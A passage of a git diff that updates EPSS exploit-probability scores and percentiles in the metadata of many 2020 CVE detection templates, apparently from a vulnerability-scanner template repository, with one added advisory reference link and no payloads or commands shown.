b/http/cves/2020/CVE-2020-11991.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-11991 cwe-id: CWE-611 epss-score: 0.80318 - epss-percentile: 0.97888 + epss-percentile: 0.97932 cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 5b617f70fe..e6d1f98eeb 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-12054 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.46935 + epss-percentile: 0.47247 cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12116.yaml b/http/cves/2020/CVE-2020-12116.yaml index 473e6bb038..6e06666baa 100644 --- a/http/cves/2020/CVE-2020-12116.yaml +++ b/http/cves/2020/CVE-2020-12116.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12116 cwe-id: CWE-22 - epss-score: 0.97355 - epss-percentile: 0.99837 + epss-score: 0.97317 + epss-percentile: 0.99832 cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index 8dc8aaf297..eac7f5d4f0 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-12127 cwe-id: CWE-306 epss-score: 0.03579 - epss-percentile: 0.90419 + epss-percentile: 0.90532 cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml index 4819141651..5a0bff5b5d 100644 --- a/http/cves/2020/CVE-2020-12447.yaml +++ b/http/cves/2020/CVE-2020-12447.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-12447 cwe-id: CWE-22 epss-score: 0.01778 - epss-percentile: 0.86487 + epss-percentile: 0.86618 cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index ad2d30f4e3..2f92b03956 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12478 cwe-id: CWE-306 - epss-score: 0.00901 - epss-percentile: 0.80707 + epss-score: 0.01186 + epss-percentile: 0.83531 cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index e8b41142b1..ce514c881d 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12720 cwe-id: CWE-306 - epss-score: 0.88108 - epss-percentile: 0.98245 + epss-score: 0.88434 + epss-percentile: 0.98327 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml index b6875bf25e..6af9631a1a 100644 --- a/http/cves/2020/CVE-2020-12800.yaml +++ b/http/cves/2020/CVE-2020-12800.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12800 cwe-id: CWE-434 - epss-score: 0.97435 - epss-percentile: 0.99908 + epss-score: 0.97463 + epss-percentile: 0.99945 cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index a6b3d6c3c4..af7fe4d81d 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13117 cwe-id: CWE-77 - epss-score: 0.0785 - epss-percentile: 0.93385 + epss-score: 0.0814 + epss-percentile: 0.93586 cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 3c838fa841..bc00c3dfde 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-13121 cwe-id: CWE-601 epss-score: 0.00235 - epss-percentile: 0.60968 + epss-percentile: 0.61357 cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index c15aba993a..9ac78a2a69 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13158 cwe-id: CWE-22 - epss-score: 0.96791 - epss-percentile: 0.99534 + epss-score: 0.01822 + epss-percentile: 0.86835 cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index 89b1dd8a89..30f8354499 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13167 cwe-id: CWE-78 - epss-score: 0.97384 - epss-percentile: 0.99866 + epss-score: 0.97419 + epss-percentile: 0.99907 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 7c147fd267..e9ffd3db7b 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-13258 cwe-id: CWE-79 epss-score: 0.00464 - epss-percentile: 0.72315 + epss-percentile: 0.72621 cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 4c7271634f..772a98cc4f 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.2 cve-id: CVE-2020-13379 cwe-id: CWE-918 - epss-score: 0.21406 - epss-percentile: 0.95791 + epss-score: 0.25457 + epss-percentile: 0.96124 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index db1237dbf3..096456aa01 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13405 cwe-id: CWE-306 - epss-score: 0.00667 - epss-percentile: 0.77128 + epss-score: 0.00568 + epss-percentile: 0.75264 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 1f3dd04976..dbe47cf1c5 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-13483 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44064 + epss-percentile: 0.44439 cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index c65a25f842..104a16b49f 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-13700 cwe-id: CWE-639 epss-score: 0.01923 - epss-percentile: 0.87118 + epss-percentile: 0.87261 cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 5af75f43af..16d87cc15e 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-13820 cwe-id: CWE-79 epss-score: 0.00237 - epss-percentile: 0.6108 + epss-percentile: 0.61465 cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index b151e7241b..3ddc1e9d7e 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -13,13 +13,14 @@ info: - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html - https://airflow.apache.org/docs/1.10.11/security.html#api-authenticatio - https://nvd.nist.gov/vuln/detail/CVE-2020-13927 + - http://packetstormsecurity.com/files/174764/Apache-Airflow-1.10.10-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13927 cwe-id: CWE-1188 - epss-score: 0.95404 - epss-percentile: 0.99097 + epss-score: 0.96709 + epss-percentile: 0.99527 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 4d89be4108..cf9c5d47e9 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-13937 cwe-id: CWE-922 - epss-score: 0.97402 - epss-percentile: 0.99877 + epss-score: 0.97368 + epss-percentile: 0.99862 cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml index 2e073f4233..509fd5f9d4 100644 --- a/http/cves/2020/CVE-2020-13942.yaml +++ b/http/cves/2020/CVE-2020-13942.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13942 cwe-id: CWE-74,CWE-20 - epss-score: 0.97533 - epss-percentile: 0.99986 + epss-score: 0.97521 + epss-percentile: 0.99985 cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 573b402eb2..3ddb6af6b8 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2020-13945 cwe-id: CWE-522 - epss-score: 0.00522 - epss-percentile: 0.73906 + epss-score: 0.00675 + epss-percentile: 0.77531 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index 309fc4e226..93aca396eb 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-14092 cwe-id: CWE-89 - epss-score: 0.76739 - epss-percentile: 0.97784 + epss-score: 0.8059 + epss-percentile: 0.97939 cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index 5104f23a7f..9e4170a8ec 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2020-14144 cwe-id: CWE-78 - epss-score: 0.96765 - epss-percentile: 0.99519 + epss-score: 0.96958 + epss-percentile: 0.99632 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index fd516899d0..6e2b1539cd 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -14,8 +14,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-14179 - epss-score: 0.0047 - epss-percentile: 0.72498 + epss-score: 0.0071 + epss-percentile: 0.78213 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 7b10964739..d785363ae4 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-14181 cwe-id: CWE-200 - epss-score: 0.96932 - epss-percentile: 0.99604 + epss-score: 0.9695 + epss-percentile: 0.99627 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 1ca2d335d1..123505ce37 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-14408 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44064 + epss-percentile: 0.44439 cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index 0dad2fc4c5..22a8f1a490 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-14413 cwe-id: CWE-79 epss-score: 0.00095 - epss-percentile: 0.39345 + epss-percentile: 0.397 cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index 27bda7f163..5ac6164ed8 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -18,7 +18,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14750 - epss-score: 0.97553 + epss-score: 0.97545 epss-percentile: 0.99993 cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index ac6913782f..01de314da9 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-14864 cwe-id: CWE-22 - epss-score: 0.32452 - epss-percentile: 0.96445 + epss-score: 0.21458 + epss-percentile: 0.95862 cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 1bf1e299b8..6bf193ec6c 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14882 - epss-score: 0.97537 - epss-percentile: 0.99988 + epss-score: 0.97454 + epss-percentile: 0.99939 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 814bba4b47..0d37497227 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-14883 - epss-score: 0.97537 - epss-percentile: 0.99989 + epss-score: 0.97273 + epss-percentile: 0.99799 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index 29c3fdd32d..9f9b056b79 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-15050 cwe-id: CWE-22 - epss-score: 0.13878 - epss-percentile: 0.94934 + epss-score: 0.14372 + epss-percentile: 0.9509 cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index 6a8807160c..5fb49e7ffe 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.7 cve-id: CVE-2020-15129 cwe-id: CWE-601 - epss-score: 0.00519 - epss-percentile: 0.73814 + epss-score: 0.00701 + epss-percentile: 0.78049 cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 7081184174..3678793ed9 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -16,8 +16,8 @@ info: cvss-score: 10 cve-id: CVE-2020-15148 cwe-id: CWE-502 - epss-score: 0.02226 - epss-percentile: 0.88079 + epss-score: 0.01898 + epss-percentile: 0.87164 cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index 523af36581..72e3641ad7 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15227 cwe-id: CWE-94,CWE-74 - epss-score: 0.97364 - epss-percentile: 0.99844 + epss-score: 0.97307 + epss-percentile: 0.99823 cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index d65405b195..73b590dbc3 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-15500 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58204 + epss-percentile: 0.58606 cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15505.yaml b/http/cves/2020/CVE-2020-15505.yaml index 40b56112a3..8501c9e540 100644 --- a/http/cves/2020/CVE-2020-15505.yaml +++ b/http/cves/2020/CVE-2020-15505.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15505 cwe-id: CWE-706 - epss-score: 0.97504 - epss-percentile: 0.99964 + epss-score: 0.9749 + epss-percentile: 0.99965 cpe: cpe:2.3:a:mobileiron:core:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index 1ec5541c20..08baba67c4 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15568 cwe-id: CWE-913 - epss-score: 0.96537 - epss-percentile: 0.99422 + epss-score: 0.96299 + epss-percentile: 0.99366 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index bb876fa7dd..3970bb534e 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-15867 - epss-score: 0.96465 - epss-percentile: 0.99385 + epss-score: 0.96701 + epss-percentile: 0.99523 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 9c81fb4583..dc22905999 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-15895 cwe-id: CWE-79 epss-score: 0.00187 - epss-percentile: 0.55288 + epss-percentile: 0.55712 cpe: cpe:2.3:o:d-link:dir-816l_firmware:2.06:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml index a2e50b0914..66a056e5fd 100644 --- a/http/cves/2020/CVE-2020-15920.yaml +++ b/http/cves/2020/CVE-2020-15920.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-15920 cwe-id: CWE-78 - epss-score: 0.97263 - epss-percentile: 0.9977 + epss-score: 0.97253 + epss-percentile: 0.99783 cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index a536e8c9ad..3d734d2042 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-16139 - epss-score: 0.01181 - epss-percentile: 0.83291 + epss-score: 0.01392 + epss-percentile: 0.84873 cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index c47950a257..9dc84dd4a2 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-16846 cwe-id: CWE-78 - epss-score: 0.97514 - epss-percentile: 0.99971 + epss-score: 0.97532 + epss-percentile: 0.99988 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index 74abe037fc..0a55c3739b 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.8 cve-id: CVE-2020-16952 cwe-id: CWE-346 - epss-score: 0.19008 - epss-percentile: 0.95588 + epss-score: 0.45162 + epss-percentile: 0.96984 cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index 265447c295..d7f80b089c 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-17362 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.40822 + epss-percentile: 0.41124 cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 4bf0b83c61..d930c0fde6 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-17453 cwe-id: CWE-79 epss-score: 0.01736 - epss-percentile: 0.86329 + epss-percentile: 0.86446 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 48ffd08882..ae589f5d67 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17456 cwe-id: CWE-78 - epss-score: 0.97265 - epss-percentile: 0.99771 + epss-score: 0.97256 + epss-percentile: 0.99786 cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index 823130a149..b676e16005 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17463 cwe-id: CWE-89 - epss-score: 0.8963 - epss-percentile: 0.98341 + epss-score: 0.89553 + epss-percentile: 0.984 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 32401aaa7b..d9b586709c 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17496 cwe-id: CWE-74 - epss-score: 0.97475 - epss-percentile: 0.99945 + epss-score: 0.97451 + epss-percentile: 0.99938 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 5ae63f48fe..1bb54d2786 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-17505 cwe-id: CWE-78 - epss-score: 0.96863 - epss-percentile: 0.99563 + epss-score: 0.96839 + epss-percentile: 0.99574 cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index f2772e384e..744fbca8dc 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17506 cwe-id: CWE-89 - epss-score: 0.96091 - epss-percentile: 0.9927 + epss-score: 0.95885 + epss-percentile: 0.99255 cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 8ccdfb2ec2..483c6aa6f4 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-17518 cwe-id: CWE-22,CWE-23 - epss-score: 0.97465 - epss-percentile: 0.99936 + epss-score: 0.97464 + epss-percentile: 0.99946 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index 